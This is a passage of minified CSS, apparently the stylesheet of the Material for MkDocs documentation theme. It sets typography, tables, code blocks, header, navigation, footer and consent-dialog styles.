');--md-typeset-table-sort-icon--desc:url('data:image/svg+xml;charset=utf-8,
')}.md-typeset{-webkit-print-color-adjust:exact;color-adjust:exact;font-size:.8rem;line-height:1.6}@media print{.md-typeset{font-size:.68rem}}.md-typeset blockquote,.md-typeset dl,.md-typeset figure,.md-typeset ol,.md-typeset pre,.md-typeset ul{margin-bottom:1em;margin-top:1em}.md-typeset h1{color:var(--md-default-fg-color--light);font-size:2em;line-height:1.3;margin:0 0 1.25em}.md-typeset h1,.md-typeset h2{font-weight:300;letter-spacing:-.01em}.md-typeset h2{font-size:1.5625em;line-height:1.4;margin:1.6em 0 .64em}.md-typeset h3{font-size:1.25em;font-weight:400;letter-spacing:-.01em;line-height:1.5;margin:1.6em 0 .8em}.md-typeset h2+h3{margin-top:.8em}.md-typeset h4{font-weight:700;letter-spacing:-.01em;margin:1em 0}.md-typeset h5,.md-typeset h6{color:var(--md-default-fg-color--light);font-size:.8em;font-weight:700;letter-spacing:-.01em;margin:1.25em 0}.md-typeset h5{text-transform:uppercase}.md-typeset hr{border-bottom:.05rem solid var(--md-default-fg-color--lightest);display:flow-root;margin:1.5em 0}.md-typeset a{color:var(--md-typeset-a-color);word-break:break-word}.md-typeset a,.md-typeset a:before{transition:color 125ms}.md-typeset a:focus,.md-typeset a:hover{color:var(--md-accent-fg-color)}.md-typeset a:focus code,.md-typeset a:hover code{background-color:var(--md-accent-fg-color--transparent)}.md-typeset a code{color:currentcolor;transition:background-color 125ms}.md-typeset a.focus-visible{outline-color:var(--md-accent-fg-color);outline-offset:.2rem}.md-typeset code,.md-typeset kbd,.md-typeset pre{color:var(--md-code-fg-color);direction:ltr;font-variant-ligatures:none}@media print{.md-typeset code,.md-typeset kbd,.md-typeset pre{white-space:pre-wrap}}.md-typeset code{background-color:var(--md-code-bg-color);border-radius:.1rem;-webkit-box-decoration-break:clone;box-decoration-break:clone;font-size:.85em;padding:0 .2941176471em;word-break:break-word}.md-typeset code:not(.focus-visible){-webkit-tap-highlight-color:transparent;outline:none}.md-typeset 
pre{display:flow-root;line-height:1.4;position:relative}.md-typeset pre>code{-webkit-box-decoration-break:slice;box-decoration-break:slice;box-shadow:none;display:block;margin:0;outline-color:var(--md-accent-fg-color);overflow:auto;padding:.7720588235em 1.1764705882em;scrollbar-color:var(--md-default-fg-color--lighter) #0000;scrollbar-width:thin;touch-action:auto;word-break:normal}.md-typeset pre>code:hover{scrollbar-color:var(--md-accent-fg-color) #0000}.md-typeset pre>code::-webkit-scrollbar{height:.2rem;width:.2rem}.md-typeset pre>code::-webkit-scrollbar-thumb{background-color:var(--md-default-fg-color--lighter)}.md-typeset pre>code::-webkit-scrollbar-thumb:hover{background-color:var(--md-accent-fg-color)}.md-typeset kbd{background-color:var(--md-typeset-kbd-color);border-radius:.1rem;box-shadow:0 .1rem 0 .05rem var(--md-typeset-kbd-border-color),0 .1rem 0 var(--md-typeset-kbd-border-color),0 -.1rem .2rem var(--md-typeset-kbd-accent-color) inset;color:var(--md-default-fg-color);display:inline-block;font-size:.75em;padding:0 .6666666667em;vertical-align:text-top;word-break:break-word}.md-typeset mark{background-color:var(--md-typeset-mark-color);-webkit-box-decoration-break:clone;box-decoration-break:clone;color:inherit;word-break:break-word}.md-typeset abbr{border-bottom:.05rem dotted var(--md-default-fg-color--light);cursor:help;text-decoration:none}@media (hover:none){.md-typeset abbr[title]:focus:after,.md-typeset abbr[title]:hover:after{background-color:var(--md-default-fg-color);border-radius:.1rem;box-shadow:var(--md-shadow-z3);color:var(--md-default-bg-color);content:attr(title);font-size:.7rem;left:.8rem;margin-top:2em;padding:.2rem .3rem;position:absolute;right:.8rem}}.md-typeset small{opacity:.75}[dir=ltr] .md-typeset sub,[dir=ltr] .md-typeset sup{margin-left:.078125em}[dir=rtl] .md-typeset sub,[dir=rtl] .md-typeset sup{margin-right:.078125em}[dir=ltr] .md-typeset blockquote{padding-left:.6rem}[dir=rtl] .md-typeset 
blockquote{padding-right:.6rem}[dir=ltr] .md-typeset blockquote{border-left:.2rem solid var(--md-default-fg-color--lighter)}[dir=rtl] .md-typeset blockquote{border-right:.2rem solid var(--md-default-fg-color--lighter)}.md-typeset blockquote{color:var(--md-default-fg-color--light);margin-left:0;margin-right:0}.md-typeset ul{list-style-type:disc}[dir=ltr] .md-typeset ol,[dir=ltr] .md-typeset ul{margin-left:.625em}[dir=rtl] .md-typeset ol,[dir=rtl] .md-typeset ul{margin-right:.625em}.md-typeset ol,.md-typeset ul{padding:0}.md-typeset ol:not([hidden]),.md-typeset ul:not([hidden]){display:flow-root}.md-typeset ol ol,.md-typeset ul ol{list-style-type:lower-alpha}.md-typeset ol ol ol,.md-typeset ul ol ol{list-style-type:lower-roman}[dir=ltr] .md-typeset ol li,[dir=ltr] .md-typeset ul li{margin-left:1.25em}[dir=rtl] .md-typeset ol li,[dir=rtl] .md-typeset ul li{margin-right:1.25em}.md-typeset ol li,.md-typeset ul li{margin-bottom:.5em}.md-typeset ol li blockquote,.md-typeset ol li p,.md-typeset ul li blockquote,.md-typeset ul li p{margin:.5em 0}.md-typeset ol li:last-child,.md-typeset ul li:last-child{margin-bottom:0}[dir=ltr] .md-typeset ol li ol,[dir=ltr] .md-typeset ol li ul,[dir=ltr] .md-typeset ul li ol,[dir=ltr] .md-typeset ul li ul{margin-left:.625em}[dir=rtl] .md-typeset ol li ol,[dir=rtl] .md-typeset ol li ul,[dir=rtl] .md-typeset ul li ol,[dir=rtl] .md-typeset ul li ul{margin-right:.625em}.md-typeset ol li ol,.md-typeset ol li ul,.md-typeset ul li ol,.md-typeset ul li ul{margin-bottom:.5em;margin-top:.5em}[dir=ltr] .md-typeset dd{margin-left:1.875em}[dir=rtl] .md-typeset dd{margin-right:1.875em}.md-typeset dd{margin-bottom:1.5em;margin-top:1em}.md-typeset img,.md-typeset svg,.md-typeset video{height:auto;max-width:100%}.md-typeset img[align=left]{margin:1em 1em 1em 0}.md-typeset img[align=right]{margin:1em 0 1em 1em}.md-typeset img[align]:only-child{margin-top:0}.md-typeset figure{display:flow-root;margin:1em 
auto;max-width:100%;text-align:center;width:-webkit-fit-content;width:-moz-fit-content;width:fit-content}.md-typeset figure img{display:block}.md-typeset figcaption{font-style:italic;margin:1em auto;max-width:24rem}.md-typeset iframe{max-width:100%}.md-typeset table:not([class]){background-color:var(--md-default-bg-color);border:.05rem solid var(--md-typeset-table-color);border-radius:.1rem;display:inline-block;font-size:.64rem;max-width:100%;overflow:auto;touch-action:auto}@media print{.md-typeset table:not([class]){display:table}}.md-typeset table:not([class])+*{margin-top:1.5em}.md-typeset table:not([class]) td>:first-child,.md-typeset table:not([class]) th>:first-child{margin-top:0}.md-typeset table:not([class]) td>:last-child,.md-typeset table:not([class]) th>:last-child{margin-bottom:0}.md-typeset table:not([class]) td:not([align]),.md-typeset table:not([class]) th:not([align]){text-align:left}[dir=rtl] .md-typeset table:not([class]) td:not([align]),[dir=rtl] .md-typeset table:not([class]) th:not([align]){text-align:right}.md-typeset table:not([class]) th{font-weight:700;min-width:5rem;padding:.9375em 1.25em;vertical-align:top}.md-typeset table:not([class]) td{border-top:.05rem solid var(--md-typeset-table-color);padding:.9375em 1.25em;vertical-align:top}.md-typeset table:not([class]) tbody tr{transition:background-color 125ms}.md-typeset table:not([class]) tbody tr:hover{background-color:var(--md-typeset-table-color--light);box-shadow:0 .05rem 0 var(--md-default-bg-color) inset}.md-typeset table:not([class]) a{word-break:normal}.md-typeset table th[role=columnheader]{cursor:pointer}[dir=ltr] .md-typeset table th[role=columnheader]:after{margin-left:.5em}[dir=rtl] .md-typeset table th[role=columnheader]:after{margin-right:.5em}.md-typeset table 
th[role=columnheader]:after{content:"";display:inline-block;height:1.2em;-webkit-mask-image:var(--md-typeset-table-sort-icon);mask-image:var(--md-typeset-table-sort-icon);-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;transition:background-color 125ms;vertical-align:text-bottom;width:1.2em}.md-typeset table th[role=columnheader]:hover:after{background-color:var(--md-default-fg-color--lighter)}.md-typeset table th[role=columnheader][aria-sort=ascending]:after{background-color:var(--md-default-fg-color--light);-webkit-mask-image:var(--md-typeset-table-sort-icon--asc);mask-image:var(--md-typeset-table-sort-icon--asc)}.md-typeset table th[role=columnheader][aria-sort=descending]:after{background-color:var(--md-default-fg-color--light);-webkit-mask-image:var(--md-typeset-table-sort-icon--desc);mask-image:var(--md-typeset-table-sort-icon--desc)}.md-typeset__scrollwrap{margin:1em -.8rem;overflow-x:auto;touch-action:auto}.md-typeset__table{display:inline-block;margin-bottom:.5em;padding:0 .8rem}@media print{.md-typeset__table{display:block}}html .md-typeset__table table{display:table;margin:0;overflow:hidden;width:100%}@media screen and (max-width:44.9375em){.md-content__inner>pre{margin:1em -.8rem}.md-content__inner>pre code{border-radius:0}}.md-banner{background-color:var(--md-footer-bg-color);color:var(--md-footer-fg-color);overflow:auto}@media print{.md-banner{display:none}}.md-banner--warning{background-color:var(--md-warning-bg-color);color:var(--md-warning-fg-color)}.md-banner__inner{font-size:.7rem;margin:.6rem auto;padding:0 .8rem}[dir=ltr] .md-banner__button{float:right}[dir=rtl] .md-banner__button{float:left}.md-banner__button{color:inherit;cursor:pointer;transition:opacity .25s}.md-banner__button:hover{opacity:.7}html{font-size:125%;height:100%;overflow-x:hidden}@media screen and (min-width:100em){html{font-size:137.5%}}@media screen and 
(min-width:125em){html{font-size:150%}}body{background-color:var(--md-default-bg-color);display:flex;flex-direction:column;font-size:.5rem;min-height:100%;position:relative;width:100%}@media print{body{display:block}}@media screen and (max-width:59.9375em){body[data-md-scrolllock]{position:fixed}}.md-grid{margin-left:auto;margin-right:auto;max-width:61rem}.md-container{display:flex;flex-direction:column;flex-grow:1}@media print{.md-container{display:block}}.md-main{flex-grow:1}.md-main__inner{display:flex;height:100%;margin-top:1.5rem}.md-ellipsis{overflow:hidden;text-overflow:ellipsis}.md-toggle{display:none}.md-option{height:0;opacity:0;position:absolute;width:0}.md-option:checked+label:not([hidden]){display:block}.md-option.focus-visible+label{outline-color:var(--md-accent-fg-color);outline-style:auto}.md-skip{background-color:var(--md-default-fg-color);border-radius:.1rem;color:var(--md-default-bg-color);font-size:.64rem;margin:.5rem;opacity:0;outline-color:var(--md-accent-fg-color);padding:.3rem .5rem;position:fixed;transform:translateY(.4rem);z-index:-1}.md-skip:focus{opacity:1;transform:translateY(0);transition:transform .25s cubic-bezier(.4,0,.2,1),opacity 175ms 75ms;z-index:10}@page{margin:25mm}:root{--md-clipboard-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-clipboard{border-radius:.1rem;color:var(--md-default-fg-color--lightest);cursor:pointer;height:1.5em;outline-color:var(--md-accent-fg-color);outline-offset:.1rem;position:absolute;right:.5em;top:.5em;transition:color .25s;width:1.5em;z-index:1}@media print{.md-clipboard{display:none}}.md-clipboard:not(.focus-visible){-webkit-tap-highlight-color:transparent;outline:none}:hover>.md-clipboard{color:var(--md-default-fg-color--light)}.md-clipboard:focus,.md-clipboard:hover{color:var(--md-accent-fg-color)}.md-clipboard:after{background-color:currentcolor;content:"";display:block;height:1.125em;margin:0 auto;-webkit-mask-image:var(--md-clipboard-icon);mask-image:var(--md-clipboard-icon);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;width:1.125em}.md-clipboard--inline{cursor:pointer}.md-clipboard--inline code{transition:color .25s,background-color .25s}.md-clipboard--inline:focus code,.md-clipboard--inline:hover code{background-color:var(--md-accent-fg-color--transparent);color:var(--md-accent-fg-color)}@keyframes consent{0%{opacity:0;transform:translateY(100%)}to{opacity:1;transform:translateY(0)}}@keyframes overlay{0%{opacity:0}to{opacity:1}}.md-consent__overlay{animation:overlay .25s both;-webkit-backdrop-filter:blur(.1rem);backdrop-filter:blur(.1rem);background-color:#0000008a;height:100%;opacity:1;position:fixed;top:0;width:100%;z-index:5}.md-consent__inner{animation:consent .5s cubic-bezier(.1,.7,.1,1) both;background-color:var(--md-default-bg-color);border:0;border-radius:.1rem;bottom:0;box-shadow:0 0 .2rem #0000001a,0 .2rem .4rem #0003;max-height:100%;overflow:auto;padding:0;position:fixed;width:100%;z-index:5}.md-consent__form{padding:.8rem}.md-consent__settings{display:none;margin:1em 0}input:checked+.md-consent__settings{display:block}.md-consent__controls{margin-bottom:.8rem}.md-typeset .md-consent__controls .md-button{display:inline}@media screen and 
(max-width:44.9375em){.md-typeset .md-consent__controls .md-button{display:block;margin-top:.4rem;text-align:center;width:100%}}.md-consent label{cursor:pointer}.md-content{flex-grow:1;min-width:0}.md-content__inner{margin:0 .8rem 1.2rem;padding-top:.6rem}@media screen and (min-width:76.25em){[dir=ltr] .md-sidebar--primary:not([hidden])~.md-content>.md-content__inner{margin-left:1.2rem}[dir=ltr] .md-sidebar--secondary:not([hidden])~.md-content>.md-content__inner,[dir=rtl] .md-sidebar--primary:not([hidden])~.md-content>.md-content__inner{margin-right:1.2rem}[dir=rtl] .md-sidebar--secondary:not([hidden])~.md-content>.md-content__inner{margin-left:1.2rem}}.md-content__inner:before{content:"";display:block;height:.4rem}.md-content__inner>:last-child{margin-bottom:0}[dir=ltr] .md-content__button{float:right}[dir=rtl] .md-content__button{float:left}[dir=ltr] .md-content__button{margin-left:.4rem}[dir=rtl] .md-content__button{margin-right:.4rem}.md-content__button{margin:.4rem 0;padding:0}@media print{.md-content__button{display:none}}.md-typeset .md-content__button{color:var(--md-default-fg-color--lighter)}.md-content__button svg{display:inline;vertical-align:top}[dir=rtl] .md-content__button svg{transform:scaleX(-1)}[dir=ltr] .md-dialog{right:.8rem}[dir=rtl] .md-dialog{left:.8rem}.md-dialog{background-color:var(--md-default-fg-color);border-radius:.1rem;bottom:.8rem;box-shadow:var(--md-shadow-z3);min-width:11.1rem;opacity:0;padding:.4rem .6rem;pointer-events:none;position:fixed;transform:translateY(100%);transition:transform 0ms .4s,opacity .4s;z-index:4}@media print{.md-dialog{display:none}}.md-dialog--active{opacity:1;pointer-events:auto;transform:translateY(0);transition:transform .4s cubic-bezier(.075,.85,.175,1),opacity .4s}.md-dialog__inner{color:var(--md-default-bg-color);font-size:.7rem}.md-feedback{margin:2em 0 1em;text-align:center}.md-feedback fieldset{border:none;margin:0;padding:0}.md-feedback__title{font-weight:700;margin:1em 
auto}.md-feedback__inner{position:relative}.md-feedback__list{align-content:baseline;display:flex;flex-wrap:wrap;justify-content:center;position:relative}.md-feedback__list:hover .md-icon:not(:disabled){color:var(--md-default-fg-color--lighter)}:disabled .md-feedback__list{min-height:1.8rem}.md-feedback__icon{color:var(--md-default-fg-color--light);cursor:pointer;flex-shrink:0;margin:0 .1rem;transition:color 125ms}.md-feedback__icon:not(:disabled).md-icon:hover{color:var(--md-accent-fg-color)}.md-feedback__icon:disabled{color:var(--md-default-fg-color--lightest);pointer-events:none}.md-feedback__note{opacity:0;position:relative;transform:translateY(.4rem);transition:transform .4s cubic-bezier(.1,.7,.1,1),opacity .15s}.md-feedback__note>*{margin:0 auto;max-width:16rem}:disabled .md-feedback__note{opacity:1;transform:translateY(0)}.md-footer{background-color:var(--md-footer-bg-color);color:var(--md-footer-fg-color)}@media print{.md-footer{display:none}}.md-footer__inner{justify-content:space-between;overflow:auto;padding:.2rem}.md-footer__inner:not([hidden]){display:flex}.md-footer__link{align-items:end;display:flex;flex-grow:0.01;margin-bottom:.4rem;margin-top:1rem;max-width:100%;outline-color:var(--md-accent-fg-color);overflow:hidden;transition:opacity .25s}.md-footer__link:focus,.md-footer__link:hover{opacity:.7}[dir=rtl] .md-footer__link svg{transform:scaleX(-1)}@media screen and (max-width:44.9375em){.md-footer__link--prev{flex-shrink:0}.md-footer__link--prev .md-footer__title{display:none}}[dir=ltr] .md-footer__link--next{margin-left:auto}[dir=rtl] .md-footer__link--next{margin-right:auto}.md-footer__link--next{text-align:right}[dir=rtl] .md-footer__link--next{text-align:left}.md-footer__title{flex-grow:1;font-size:.9rem;margin-bottom:.7rem;max-width:calc(100% - 2.4rem);padding:0 
1rem;white-space:nowrap}.md-footer__button{margin:.2rem;padding:.4rem}.md-footer__direction{font-size:.64rem;opacity:.7}.md-footer-meta{background-color:var(--md-footer-bg-color--dark)}.md-footer-meta__inner{display:flex;flex-wrap:wrap;justify-content:space-between;padding:.2rem}html .md-footer-meta.md-typeset a{color:var(--md-footer-fg-color--light)}html .md-footer-meta.md-typeset a:focus,html .md-footer-meta.md-typeset a:hover{color:var(--md-footer-fg-color)}.md-copyright{color:var(--md-footer-fg-color--lighter);font-size:.64rem;margin:auto .6rem;padding:.4rem 0;width:100%}@media screen and (min-width:45em){.md-copyright{width:auto}}.md-copyright__highlight{color:var(--md-footer-fg-color--light)}.md-social{margin:0 .4rem;padding:.2rem 0 .6rem}@media screen and (min-width:45em){.md-social{padding:.6rem 0}}.md-social__link{display:inline-block;height:1.6rem;text-align:center;width:1.6rem}.md-social__link:before{line-height:1.9}.md-social__link svg{fill:currentcolor;max-height:.8rem;vertical-align:-25%}.md-typeset .md-button{border:.1rem solid;border-radius:.1rem;color:var(--md-primary-fg-color);cursor:pointer;display:inline-block;font-weight:700;padding:.625em 2em;transition:color 125ms,background-color 125ms,border-color 125ms}.md-typeset .md-button--primary{background-color:var(--md-primary-fg-color);border-color:var(--md-primary-fg-color);color:var(--md-primary-bg-color)}.md-typeset .md-button:focus,.md-typeset .md-button:hover{background-color:var(--md-accent-fg-color);border-color:var(--md-accent-fg-color);color:var(--md-accent-bg-color)}[dir=ltr] .md-typeset .md-input{border-top-left-radius:.1rem}[dir=ltr] .md-typeset .md-input,[dir=rtl] .md-typeset .md-input{border-top-right-radius:.1rem}[dir=rtl] .md-typeset .md-input{border-top-left-radius:.1rem}.md-typeset .md-input{border-bottom:.1rem solid var(--md-default-fg-color--lighter);box-shadow:var(--md-shadow-z1);font-size:.8rem;height:1.8rem;padding:0 .6rem;transition:border .25s,box-shadow .25s}.md-typeset 
.md-input:focus,.md-typeset .md-input:hover{border-bottom-color:var(--md-accent-fg-color);box-shadow:var(--md-shadow-z2)}.md-typeset .md-input--stretch{width:100%}.md-header{background-color:var(--md-primary-fg-color);box-shadow:0 0 .2rem #0000,0 .2rem .4rem #0000;color:var(--md-primary-bg-color);display:block;left:0;position:sticky;right:0;top:0;z-index:4}@media print{.md-header{display:none}}.md-header[hidden]{transform:translateY(-100%);transition:transform .25s cubic-bezier(.8,0,.6,1),box-shadow .25s}.md-header--shadow{box-shadow:0 0 .2rem #0000001a,0 .2rem .4rem #0003;transition:transform .25s cubic-bezier(.1,.7,.1,1),box-shadow .25s}.md-header__inner{align-items:center;display:flex;padding:0 .2rem}.md-header__button{color:currentcolor;cursor:pointer;margin:.2rem;outline-color:var(--md-accent-fg-color);padding:.4rem;position:relative;transition:opacity .25s;vertical-align:middle;z-index:1}.md-header__button:hover{opacity:.7}.md-header__button:not([hidden]){display:inline-block}.md-header__button:not(.focus-visible){-webkit-tap-highlight-color:transparent;outline:none}.md-header__button.md-logo{margin:.2rem;padding:.4rem}@media screen and (max-width:76.1875em){.md-header__button.md-logo{display:none}}.md-header__button.md-logo img,.md-header__button.md-logo svg{fill:currentcolor;display:block;height:1.2rem;width:auto}@media screen and (min-width:60em){.md-header__button[for=__search]{display:none}}.no-js .md-header__button[for=__search]{display:none}[dir=rtl] .md-header__button[for=__search] svg{transform:scaleX(-1)}@media screen and (min-width:76.25em){.md-header__button[for=__drawer]{display:none}}.md-header__topic{display:flex;max-width:100%;position:absolute;transition:transform .4s cubic-bezier(.1,.7,.1,1),opacity .15s;white-space:nowrap}.md-header__topic+.md-header__topic{opacity:0;pointer-events:none;transform:translateX(1.25rem);transition:transform .4s cubic-bezier(1,.7,.1,.1),opacity .15s;z-index:-1}[dir=rtl] 
.md-header__topic+.md-header__topic{transform:translateX(-1.25rem)}.md-header__topic:first-child{font-weight:700}[dir=ltr] .md-header__title{margin-left:1rem}[dir=rtl] .md-header__title{margin-right:1rem}[dir=ltr] .md-header__title{margin-right:.4rem}[dir=rtl] .md-header__title{margin-left:.4rem}.md-header__title{flex-grow:1;font-size:.9rem;height:2.4rem;line-height:2.4rem}.md-header__title--active .md-header__topic{opacity:0;pointer-events:none;transform:translateX(-1.25rem);transition:transform .4s cubic-bezier(1,.7,.1,.1),opacity .15s;z-index:-1}[dir=rtl] .md-header__title--active .md-header__topic{transform:translateX(1.25rem)}.md-header__title--active .md-header__topic+.md-header__topic{opacity:1;pointer-events:auto;transform:translateX(0);transition:transform .4s cubic-bezier(.1,.7,.1,1),opacity .15s;z-index:0}.md-header__title>.md-header__ellipsis{height:100%;position:relative;width:100%}.md-header__option{display:flex;flex-shrink:0;max-width:100%;transition:max-width 0ms .25s,opacity .25s .25s;white-space:nowrap}[data-md-toggle=search]:checked~.md-header .md-header__option{max-width:0;opacity:0;transition:max-width 0ms,opacity 0ms}.md-header__source{display:none}@media screen and (min-width:60em){[dir=ltr] .md-header__source{margin-left:1rem}[dir=rtl] .md-header__source{margin-right:1rem}.md-header__source{display:block;max-width:11.7rem;width:11.7rem}}@media screen and (min-width:76.25em){[dir=ltr] .md-header__source{margin-left:1.4rem}[dir=rtl] .md-header__source{margin-right:1.4rem}}:root{--md-nav-icon--prev:url('data:image/svg+xml;charset=utf-8,
');--md-nav-icon--next:url('data:image/svg+xml;charset=utf-8,
');--md-toc-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-nav{font-size:.7rem;line-height:1.3}.md-nav__title{color:var(--md-default-fg-color--light);display:block;font-weight:700;overflow:hidden;padding:0 .6rem;text-overflow:ellipsis}.md-nav__title .md-nav__button{display:none}.md-nav__title .md-nav__button img{height:100%;width:auto}.md-nav__title .md-nav__button.md-logo img,.md-nav__title .md-nav__button.md-logo svg{fill:currentcolor;display:block;height:2.4rem;max-width:100%;object-fit:contain;width:auto}.md-nav__list{list-style:none;margin:0;padding:0}.md-nav__item{padding:0 .6rem}[dir=ltr] .md-nav__item .md-nav__item{padding-right:0}[dir=rtl] .md-nav__item .md-nav__item{padding-left:0}.md-nav__link{align-items:center;cursor:pointer;display:flex;justify-content:space-between;margin-top:.625em;overflow:hidden;scroll-snap-align:start;text-overflow:ellipsis;transition:color 125ms}.md-nav__link--passed{color:var(--md-default-fg-color--light)}.md-nav__item .md-nav__link--active{color:var(--md-typeset-a-color)}.md-nav__item .md-nav__link--index [href]{width:100%}.md-nav__link:focus,.md-nav__link:hover{color:var(--md-accent-fg-color)}.md-nav__link.focus-visible{outline-color:var(--md-accent-fg-color);outline-offset:.2rem}.md-nav--primary .md-nav__link[for=__toc]{display:none}.md-nav--primary .md-nav__link[for=__toc] .md-icon:after{background-color:currentcolor;display:block;height:100%;-webkit-mask-image:var(--md-toc-icon);mask-image:var(--md-toc-icon);width:100%}.md-nav--primary .md-nav__link[for=__toc]~.md-nav{display:none}.md-nav__link>*{cursor:pointer;display:flex}.md-nav__icon{flex-shrink:0}.md-nav__source{display:none}@media screen and (max-width:76.1875em){.md-nav--primary,.md-nav--primary .md-nav{background-color:var(--md-default-bg-color);display:flex;flex-direction:column;height:100%;left:0;position:absolute;right:0;top:0;z-index:1}.md-nav--primary .md-nav__item,.md-nav--primary .md-nav__title{font-size:.8rem;line-height:1.5}.md-nav--primary 
.md-nav__title{background-color:var(--md-default-fg-color--lightest);color:var(--md-default-fg-color--light);cursor:pointer;height:5.6rem;line-height:2.4rem;padding:3rem .8rem .2rem;position:relative;white-space:nowrap}[dir=ltr] .md-nav--primary .md-nav__title .md-nav__icon{left:.4rem}[dir=rtl] .md-nav--primary .md-nav__title .md-nav__icon{right:.4rem}.md-nav--primary .md-nav__title .md-nav__icon{display:block;height:1.2rem;margin:.2rem;position:absolute;top:.4rem;width:1.2rem}.md-nav--primary .md-nav__title .md-nav__icon:after{background-color:currentcolor;content:"";display:block;height:100%;-webkit-mask-image:var(--md-nav-icon--prev);mask-image:var(--md-nav-icon--prev);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;width:100%}.md-nav--primary .md-nav__title~.md-nav__list{background-color:var(--md-default-bg-color);box-shadow:0 .05rem 0 var(--md-default-fg-color--lightest) inset;overflow-y:auto;scroll-snap-type:y mandatory;touch-action:pan-y}.md-nav--primary .md-nav__title~.md-nav__list>:first-child{border-top:0}.md-nav--primary .md-nav__title[for=__drawer]{background-color:var(--md-primary-fg-color);color:var(--md-primary-bg-color);font-weight:700}.md-nav--primary .md-nav__title .md-logo{display:block;left:.2rem;margin:.2rem;padding:.4rem;position:absolute;right:.2rem;top:.2rem}.md-nav--primary .md-nav__list{flex:1}.md-nav--primary .md-nav__item{border-top:.05rem solid var(--md-default-fg-color--lightest);padding:0}.md-nav--primary .md-nav__item--active>.md-nav__link{color:var(--md-typeset-a-color)}.md-nav--primary .md-nav__item--active>.md-nav__link:focus,.md-nav--primary .md-nav__item--active>.md-nav__link:hover{color:var(--md-accent-fg-color)}.md-nav--primary .md-nav__link{margin-top:0;padding:.6rem .8rem}[dir=ltr] .md-nav--primary .md-nav__link .md-nav__icon{margin-right:-.2rem}[dir=rtl] .md-nav--primary .md-nav__link 
.md-nav__icon{margin-left:-.2rem}.md-nav--primary .md-nav__link .md-nav__icon{font-size:1.2rem;height:1.2rem;width:1.2rem}.md-nav--primary .md-nav__link .md-nav__icon:after{background-color:currentcolor;content:"";display:block;height:100%;-webkit-mask-image:var(--md-nav-icon--next);mask-image:var(--md-nav-icon--next);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;width:100%}[dir=rtl] .md-nav--primary .md-nav__icon:after{transform:scale(-1)}.md-nav--primary .md-nav--secondary .md-nav{background-color:initial;position:static}[dir=ltr] .md-nav--primary .md-nav--secondary .md-nav .md-nav__link{padding-left:1.4rem}[dir=rtl] .md-nav--primary .md-nav--secondary .md-nav .md-nav__link{padding-right:1.4rem}[dir=ltr] .md-nav--primary .md-nav--secondary .md-nav .md-nav .md-nav__link{padding-left:2rem}[dir=rtl] .md-nav--primary .md-nav--secondary .md-nav .md-nav .md-nav__link{padding-right:2rem}[dir=ltr] .md-nav--primary .md-nav--secondary .md-nav .md-nav .md-nav .md-nav__link{padding-left:2.6rem}[dir=rtl] .md-nav--primary .md-nav--secondary .md-nav .md-nav .md-nav .md-nav__link{padding-right:2.6rem}[dir=ltr] .md-nav--primary .md-nav--secondary .md-nav .md-nav .md-nav .md-nav .md-nav__link{padding-left:3.2rem}[dir=rtl] .md-nav--primary .md-nav--secondary .md-nav .md-nav .md-nav .md-nav .md-nav__link{padding-right:3.2rem}.md-nav--secondary{background-color:initial}.md-nav__toggle~.md-nav{display:flex;opacity:0;transform:translateX(100%);transition:transform .25s cubic-bezier(.8,0,.6,1),opacity 125ms 50ms}[dir=rtl] .md-nav__toggle~.md-nav{transform:translateX(-100%)}.md-nav__toggle:checked~.md-nav{opacity:1;transform:translateX(0);transition:transform .25s cubic-bezier(.4,0,.2,1),opacity 125ms 125ms}.md-nav__toggle:checked~.md-nav>.md-nav__list{-webkit-backface-visibility:hidden;backface-visibility:hidden}}@media screen and (max-width:59.9375em){.md-nav--primary 
.md-nav__link[for=__toc]{display:flex}.md-nav--primary .md-nav__link[for=__toc] .md-icon:after{content:""}.md-nav--primary .md-nav__link[for=__toc]+.md-nav__link{display:none}.md-nav--primary .md-nav__link[for=__toc]~.md-nav{display:flex}.md-nav__source{background-color:var(--md-primary-fg-color--dark);color:var(--md-primary-bg-color);display:block;padding:0 .2rem}}@media screen and (min-width:60em) and (max-width:76.1875em){.md-nav--integrated .md-nav__link[for=__toc]{display:flex}.md-nav--integrated .md-nav__link[for=__toc] .md-icon:after{content:""}.md-nav--integrated .md-nav__link[for=__toc]+.md-nav__link{display:none}.md-nav--integrated .md-nav__link[for=__toc]~.md-nav{display:flex}}@media screen and (min-width:60em){.md-nav--secondary .md-nav__title{background:var(--md-default-bg-color);box-shadow:0 0 .4rem .4rem var(--md-default-bg-color);position:sticky;top:0;z-index:1}.md-nav--secondary .md-nav__title[for=__toc]{scroll-snap-align:start}.md-nav--secondary .md-nav__title .md-nav__icon{display:none}}@media screen and (min-width:76.25em){.md-nav{transition:max-height .25s cubic-bezier(.86,0,.07,1)}.md-nav--primary .md-nav__title{background:var(--md-default-bg-color);box-shadow:0 0 .4rem .4rem var(--md-default-bg-color);position:sticky;top:0;z-index:1}.md-nav--primary .md-nav__title[for=__drawer]{scroll-snap-align:start}.md-nav--primary .md-nav__title .md-nav__icon,.md-nav__toggle~.md-nav{display:none}.md-nav__toggle:checked~.md-nav,.md-nav__toggle:indeterminate~.md-nav{display:block}.md-nav__item--nested>.md-nav>.md-nav__title{display:none}.md-nav__item--section{display:block;margin:1.25em 0}.md-nav__item--section:last-child{margin-bottom:0}.md-nav__item--section>.md-nav__link{font-weight:700;pointer-events:none}.md-nav__item--section>.md-nav__link[for]{color:var(--md-default-fg-color--light)}.md-nav__item--section>.md-nav__link--index [href]{pointer-events:auto}.md-nav__item--section>.md-nav__link 
